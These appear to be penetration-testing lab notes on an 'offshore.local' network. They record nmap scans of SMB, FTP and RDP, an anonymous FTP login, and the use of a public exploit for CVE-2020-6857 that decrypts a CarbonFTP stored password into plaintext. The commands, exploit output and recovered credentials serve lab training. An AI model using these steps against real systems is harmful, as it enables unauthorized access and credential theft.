SMB
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 52.33 seconds
FTP
sudo proxychains nmap -p21 --script=ftp* 172.16.1.201 -sT -Pn
Anonymous Login allowed (For ease I did it form NIX01)
ftp anonymous@172.16.1.201Inforamtion
- Windows_NT
- Use of PORT cmds: on
CarbonFTP Exploit # CVE 2020 6857
Caption=STRING|“Joe_IIS” Exact=INTEGER|0 ExcludeMasks=STRING|"" IncludeMasks=STRING|”.” LocalFolder=STRING|“C:\inetpub” Passive=INTEGER|0 Password=STRING|“19852327402859129171335082736410993” Port=INTEGER|21 ProxyKind=INTEGER|0 ProxyPort=INTEGER|21 ProxyServer=STRING|"" RemoteFolder=STRING|”/” Server=STRING|“ftp.offshore.local” SubFilders=INTEGER|0 SyncMode=INTEGER|2 UseProxy=INTEGER|0 UserName=STRING|“joe”
Code
searchsploit -m windows/remote/48363.py
└─$ python 48363.py -p 19852327402859129171335082736410993
[+] Neowise CarbonFTP v1.4
[+] CVE-2020-6857 Insecure Proprietary Password Encryption
[+] Version 2 Exploit fixed for Python 3 compatibility
[+] Discovered and cracked by hyp3rlinx
[+] ApparitionSec
Decrypting ...
[-] 19852
[-] 32740
[-] 28591
[-] 29171
[-] 33508
[-] 27364
[-] 10993
[+] PASSWORD LENGTH: 13
[*] DECRYPTED PASSWORD: Dev0ftheyear!
3389
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: DC0
| DNS_Domain_Name: LAB.OFFSHORE.LOCAL
| DNS_Computer_Name: DC0.LAB.OFFSHORE.LOCAL
| DNS_Tree_Name: LAB.OFFSHORE.LOCAL
| Product_Version: 10.0.17763
|_ System_Time: 2023-05-01T03:58:56+00:00
| ssl-cert: Subject: commonName=DC0.LAB.OFFSHORE.LOCAL
| Not valid before: 2023-04-30T02:33:57
|_Not valid after: 2023-10-30T02:33:57
|_ssl-date: 2023-05-01T03:58:54+00:00; 0s from scanner time.